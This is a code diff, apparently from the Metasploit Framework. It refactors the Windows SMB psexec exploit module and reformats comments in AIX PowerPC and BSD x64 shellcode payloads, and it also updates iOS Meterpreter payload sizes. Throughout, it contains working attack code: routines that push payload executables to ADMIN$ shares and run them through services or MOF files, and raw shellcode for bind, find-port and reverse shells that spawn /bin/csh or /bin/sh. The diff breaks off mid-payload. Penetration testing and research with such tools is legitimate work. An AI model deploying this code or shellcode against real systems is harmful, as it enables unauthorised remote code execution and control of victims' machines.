#This is not really useful but will prevent double \\ on the wire :)
if datastore['SHARE'] =~ /.[\\\/]/
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{fileprefix}\\#{filename}")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
end
else
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{filename}")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{filename} failed: #{e.message}")
end
end
end
end
def mof_upload
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
# payload as exe
print_status("Trying wbemexec...")
print_status("Uploading Payload...")
if datastore['SHARE'] != 'ADMIN$'
print_error('Wbem will only work with ADMIN$ share')
return
end
simple.connect(share)
exe = generate_payload_exe
fd = smb_open("\\system32\\#{filename}", 'rwct')
fd << exe
fd.close
print_status("Created %SystemRoot%\\system32\\#{filename}")
# mof to cause execution of above
mofname = rand_text_alphanumeric(14) + ".MOF"
mof = generate_mof(mofname, filename)
print_status("Uploading MOF...")
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
fd << mof
fd.close
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
# Disconnect from the ADMIN$
simple.disconnect(share)
end
def report_auth
service_data = {
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
port: datastore['RPORT'],
service_name: 'smb',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: datastore['SMBPass'],
username: datastore['SMBUser'].downcase
}
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
credential_data.merge!({
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: datastore['SMBDomain']
})
end
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
credential_data.merge!({:private_type => :ntlm_hash})
else
credential_data.merge!({:private_type => :password})
end
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
access_level: 'Admin',
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end

164
modules/exploits/windows/smb/psexec.rb
View File

@ -112,177 +112,25 @@ class MetasploitModule < Msf::Exploit::Remote
case target.name
when 'Automatic'
if powershell_installed?
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
print_status('Selecting PowerShell target')
powershell
execute_powershell_payload
else
print_status('Selecting native target')
native_upload
native_upload(datastore['SHARE'])
end
when 'PowerShell'
powershell
execute_powershell_payload
when 'Native upload'
native_upload
native_upload(datastore['SHARE'])
when 'MOF upload'
mof_upload
mof_upload(datastore['SHARE'])
end
handler
disconnect
end
def powershell_installed?
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
case datastore['SHARE'].upcase
when 'ADMIN$'
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
when 'C$'
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
else
path = datastore['PSH_PATH']
end
simple.connect(share)
vprint_status("Checking for #{path}")
if smb_file_exist?(path)
vprint_status('PowerShell found')
psh = true
else
vprint_status('PowerShell not found')
psh = false
end
simple.disconnect(share)
psh
end
def powershell
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
end
# Execute the powershell command
print_status("Executing the payload...")
begin
psexec(command)
rescue StandardError => exec_command_error
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
def native_upload
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
# Upload the shellcode to a file
print_status("Uploading payload...")
smbshare = datastore['SHARE']
fileprefix = ""
# if SHARE = Users/sasha/ or something like this
if smbshare =~ /.[\\\/]/
subfolder = true
smbshare = datastore['SHARE'].dup
smbshare = smbshare.gsub(/^[\\\/]/,"")
folder_list = smbshare.split(/[\\\/]/)
smbshare = folder_list[0]
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
else
subfolder = false
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{filename}", 'rwct')
end
exe = ''
opts = { :servicename => servicename, :serviceencoder => serviceencoder}
begin
exe = generate_payload_exe_service(opts)
fd << exe
ensure
fd.close
end
if subfolder
print_status("Created \\#{fileprefix}\\#{filename}...")
else
print_status("Created \\#{filename}...")
end
# Disconnect from the share
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
# define the file location
if datastore['SHARE'] == 'ADMIN$'
file_location = "%SYSTEMROOT%\\#{filename}"
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
file_location = datastore['SHARE'].slice(0,1) + ":\\#{filename}"
else
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
end
psexec(file_location, false)
unless datastore['SERVICE_PERSIST']
print_status("Deleting \\#{filename}...")
#This is not really useful but will prevent double \\ on the wire :)
if datastore['SHARE'] =~ /.[\\\/]/
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{fileprefix}\\#{filename}")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
end
else
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{filename}")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{filename} failed: #{e.message}")
end
end
end
end
def mof_upload
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
# payload as exe
print_status("Trying wbemexec...")
print_status("Uploading Payload...")
if datastore['SHARE'] != 'ADMIN$'
print_error('Wbem will only work with ADMIN$ share')
return
end
simple.connect(share)
exe = generate_payload_exe
fd = smb_open("\\system32\\#{filename}", 'rwct')
fd << exe
fd.close
print_status("Created %SystemRoot%\\system32\\#{filename}")
# mof to cause execution of above
mofname = rand_text_alphanumeric(14) + ".MOF"
mof = generate_mof(mofname, filename)
print_status("Uploading MOF...")
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
fd << mof
fd.close
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
# Disconnect from the ADMIN$
simple.disconnect(share)
end
def report_auth
service_data = {
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),

114
modules/payloads/singles/aix/ppc/shell_bind_tcp.rb
View File

@ -40,70 +40,70 @@ module MetasploitModule
super(*args)
payload =
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
"\x40\x82\xff\xfd" +# bnel <bndsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x07\xff" +# lil r29,2047 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
"\x40\x82\xff\xfd" + # bnel <bndsockcode> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x20" + # bctr #
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
"\x44\xff\xff\x02" + # svca 0 #
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
"\x3b\xa0\x07\xff" + # lil r29,2047 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
@cal_socket +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
"\x3f\x60\xff\x02" +# liu r27,-254 #
"\x63\x7b\x11\x5c" +# oril r27,r27,4444 #
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
"\x3f\x60\xff\x02" + # liu r27,-254 #
"\x63\x7b\x11\x5c" + # oril r27,r27,4444 #
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
@cal_bind +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\x83\xe3\x78" + # mr r3,r28 #
@cal_listen +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\x83\xe3\x78" + # mr r3,r28 #
@cal_accept +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) #
"\x7f\x23\xcb\x78" +# mr r3,r25 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
"\x7f\x23\xcb\x78" + # mr r3,r25 #
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x25\xcb\x78" +# mr r5,r25 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7f\x25\xcb\x78" + # mr r5,r25 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\x43\xd3\x78" + # mr r3,r26 #
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
"\x40\x80\xff\xd4" +# bge <bndsockcode+160> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <bndsockcode+208> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
"\x40\x80\xff\xd4" + # bge <bndsockcode+160> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel <bndsockcode+208> #
"\x7f\x08\x02\xa6" + # mflr r24 #
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"/bin/csh"
# If the payload is generated and there are offsets to substitute,

98
modules/payloads/singles/aix/ppc/shell_find_port.rb
View File

@ -40,59 +40,59 @@ module MetasploitModule
super(*args)
payload =
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
"\x40\x82\xff\xfd" +# bnel <fndsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x07\xff" +# lil r29,2047 #
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xf8\x2d" +# cal r27,-2003(r29) #
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
"\x7c\x3b\x0b\x78" +# mr r27,r1 #
"\x3b\xff\x01\xff" +# cal r31,511(r31) #
"\x3b\xff\xfe\x02" +# cal r31,-510(r31) #
"\x7f\x65\xdb\x78" +# mr r5,r27 #
"\x7f\x84\xe3\x78" +# mr r4,r28 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
"\x40\x82\xff\xfd" + # bnel <fndsockcode> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x20" + # bctr #
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
"\x44\xff\xff\x02" + # svca 0 #
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
"\x3b\xa0\x07\xff" + # lil r29,2047 #
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
"\x3b\x7d\xf8\x2d" + # cal r27,-2003(r29) #
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
"\x7c\x3b\x0b\x78" + # mr r27,r1 #
"\x3b\xff\x01\xff" + # cal r31,511(r31) #
"\x3b\xff\xfe\x02" + # cal r31,-510(r31) #
"\x7f\x65\xdb\x78" + # mr r5,r27 #
"\x7f\x84\xe3\x78" + # mr r4,r28 #
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
@cal_getpeername +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x3b\x5c\x01\xff" +# cal r26,511(r28) #
"\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) #
"\x28\x1a\x11\x5c" +# cmpli 0,r26,4444 #
"\x40\x82\xff\xd4" +# bne <fndsockcode+64> #
"\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) #
"\x7f\x23\xcb\x78" +# mr r3,r25 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x3b\x5c\x01\xff" + # cal r26,511(r28) #
"\xa3\x5a\xfe\x03" + # lhz r26,-509(r26) #
"\x28\x1a\x11\x5c" + # cmpli 0,r26,4444 #
"\x40\x82\xff\xd4" + # bne <fndsockcode+64> #
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
"\x7f\x23\xcb\x78" + # mr r3,r25 #
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x25\xcb\x78" +# mr r5,r25 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7f\x25\xcb\x78" + # mr r5,r25 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
"\x40\x80\xff\xd4" +# bge <fndsockcode+116> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <fndsockcode+164> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
"\x40\x80\xff\xd4" + # bge <fndsockcode+116> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel <fndsockcode+164> #
"\x7f\x08\x02\xa6" + # mflr r24 #
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"/bin/csh"
# If the payload is generated and there are offsets to substitute,

24
modules/payloads/singles/aix/ppc/shell_interact.rb
View File

@ -34,18 +34,18 @@ module MetasploitModule
super(*args)
payload =
"\x7c\xa5\x2a\x79" +# /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" +# /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" +# /* mflr r31 */
"\x3b\xff\x01\x20" +# /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" +# /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" +# /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" +# /* st r3,-240(r31) */
"\x90\xbf\xff\x14" +# /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" +# /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" +# /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" +# /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" +# /* svca */
"\x7c\xa5\x2a\x79" + # /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" + # /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" + # /* mflr r31 */
"\x3b\xff\x01\x20" + # /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" + # /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" + # /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" + # /* st r3,-240(r31) */
"\x90\xbf\xff\x14" + # /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" + # /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" + # /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" + # /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" + # /* svca */
"/bin/sh"+
"\x05"

88
modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb
View File

@ -41,55 +41,55 @@ module MetasploitModule
super(*args)
payload =
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <cntsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x25" +# cal r30,-475(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\xff\x02\x11\x5c" +# .long 0xff02115c #
"\x7f\x00\x00\x01" +# .long 0x7f000001 #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x07\xff" +# lil r29,2047 #
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel <cntsockcode> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
"\x3b\xde\xfe\x25" + # cal r30,-475(r30) #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x20" + # bctr #
"\xff\x02\x11\x5c" + # .long 0xff02115c #
"\x7f\x00\x00\x01" + # .long 0x7f000001 #
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
"\x44\xff\xff\x02" + # svca 0 #
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
"\x3b\xa0\x07\xff" + # lil r29,2047 #
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
@cal_socket +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
"\x38\x9e\xff\xf8" +# cal r4,-8(r30) #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
"\x38\x9e\xff\xf8" + # cal r4,-8(r30) #
@cal_connect +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x3b\x7d\xf8\x03" +# cal r27,-2045(r29) #
"\x7f\x63\xdb\x78" +# mr r3,r27 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x3b\x7d\xf8\x03" + # cal r27,-2045(r29) #
"\x7f\x63\xdb\x78" + # mr r3,r27 #
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x65\xdb\x78" +# mr r5,r27 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7f\x65\xdb\x78" + # mr r5,r27 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\x83\xe3\x78" + # mr r3,r28 #
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x7b\xff\xff" +# ai. r27,r27,-1 #
"\x40\x80\xff\xd4" +# bge <cntsockcode+100> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <cntsockcode+148> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x37\x7b\xff\xff" + # ai. r27,r27,-1 #
"\x40\x80\xff\xd4" + # bge <cntsockcode+100> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel <cntsockcode+148> #
"\x7f\x08\x02\xa6" + # mflr r24 #
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"/bin/csh"
# If the payload is generated and there are offsets to substitute,

2
modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
module MetasploitModule
CachedSize = 692904
CachedSize = 692988
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
module MetasploitModule
CachedSize = 692904
CachedSize = 692988
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
module MetasploitModule
CachedSize = 692904
CachedSize = 692988
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

92
modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
View File

@ -33,52 +33,52 @@ module MetasploitModule
'LPORT' => [ 20, 'n' ],
},
'Payload' =>
"\x6a\x61" +# pushq $0x61 #
"\x58" +# pop %rax #
"\x99" +# cltd #
"\x6a\x1c" +# pushq $0x1c #
"\x5f" +# pop %rdi #
"\x6a\x01" +# pushq $0x1 #
"\x5e" +# pop %rsi #
"\x0f\x05" +# syscall #
"\x48\x97" +# xchg %rax,%rdi #
"\x52" +# push %rdx #
"\x52" +# push %rdx #
"\x52" +# push %rdx #
"\xba\x00\x1c\x11\x5C" +# mov edx,0x5c111c00 #
"\x52" +# push %rdx #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x6a\x1c" +# pushq $0x1c #
"\x5a" +# pop %rdx #
"\x04\x4c" +# add $0x4c,%al #
"\x0f\x05" +# syscall #
"\x48\x31\xf6" +# xor %rsi,%rsi #
"\x6a\x6a" +# pushq $0x6a #
"\x58" +# pop %rax #
"\x0f\x05" +# syscall #
"\x99" +# cltd #
"\x04\x1e" +# add $0x1e,%al #
"\x0f\x05" +# syscall #
"\x48\x89\xc7" +# mov %rax,%rdi #
"\x6a\x5a" +# pushq $0x5a #
"\x58" +# pop %rax #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x5a" +# add $0x5a,%al #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x59" +# add $0x59,%al #
"\x0f\x05" +# syscall #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #
"\x57" +# push %rdi #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x04\x39" +# add $0x39,%al #
"\x0f\x05" # syscall #
"\x6a\x61" + # pushq $0x61 #
"\x58" + # pop %rax #
"\x99" + # cltd #
"\x6a\x1c" + # pushq $0x1c #
"\x5f" + # pop %rdi #
"\x6a\x01" + # pushq $0x1 #
"\x5e" + # pop %rsi #
